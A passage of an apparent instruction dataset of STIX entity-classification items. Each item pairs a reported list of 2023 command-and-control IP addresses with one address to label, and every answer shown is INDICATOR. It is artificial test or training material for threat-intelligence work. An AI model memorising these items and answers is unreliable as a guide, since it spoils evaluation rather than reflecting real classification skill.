"input": "### Entity:\n45.95.232.33\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n155.138.194.244\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n143.198.50.118\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.172.58.96\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n139.59.109.100\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n167.172.20.159\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 